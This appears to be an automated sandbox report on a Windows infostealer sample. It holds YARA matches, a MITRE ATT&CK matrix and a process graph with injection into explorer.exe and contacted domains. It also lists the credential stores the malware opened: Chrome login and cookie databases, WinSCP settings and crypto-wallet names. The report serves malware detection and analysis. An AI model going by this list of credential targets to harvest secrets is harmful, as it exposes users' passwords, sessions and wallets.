                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                      Source: Yara matchFile source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
                      Source: Yara matchFile source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
                      Source: Yara matchFile source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
                      Source: Yara matchFile source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                      Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                      Source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: Yara matchFile source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
                      Source: Yara matchFile source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
                      Source: Yara matchFile source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
                      Source: Yara matchFile source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Spearphishing Link
                      2
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium14
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Exploitation for Client Execution
                      1
                      Scheduled Task/Job
                      712
                      Process Injection
                      11
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      2
                      File and Directory Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      Exfiltration Over Bluetooth11
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts2
                      Command and Scripting Interpreter
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      44
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Input Capture
                      Automated Exfiltration5
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local Accounts1
                      Scheduled Task/Job
                      1
                      Services File Permissions Weakness
                      1
                      Registry Run Keys / Startup Folder
                      33
                      Software Packing
                      NTDS441
                      Security Software Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer126
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon Script1
                      Services File Permissions Weakness
                      1
                      DLL Side-Loading
                      LSA Secrets231
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      File Deletion
                      Cached Domain Credentials13
                      Process Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      Remote System Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      System Network Configuration Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Hidden Files and Directories
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                      Services File Permissions Weakness
                      Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 749806 Sample: S2XJ2wbz7u.exe Startdate: 19/11/2022 Architecture: WINDOWS Score: 100 83 lentaphoto.at 2->83 85 2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq 2->85 87 4 other IPs or domains 2->87 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for domain / URL 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 14 other signatures 2->109 11 S2XJ2wbz7u.exe 2->11         started        14 tiddsjj 2->14         started        16 rovwer.exe 2->16         started        signatures3 process4 signatures5 149 Detected unpacking (changes PE section rights) 11->149 151 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->151 153 Maps a DLL or memory area into another process 11->153 18 explorer.exe 21 11->18 injected 155 Machine Learning detection for dropped file 14->155 157 Checks if the current machine is a virtual machine (disk enumeration) 14->157 159 Creates a thread in another existing process (thread injection) 14->159 process6 dnsIp7 89 cdn-102.anonfiles.com 195.96.151.51, 443, 49716 UTA-ASAT unknown 18->89 91 cdn-104.anonfiles.com 195.96.151.53, 443, 49741 UTA-ASAT unknown 18->91 93 18 other IPs or domains 18->93 65 C:\Users\user\AppData\Roaming\tiddsjj, PE32 18->65 dropped 67 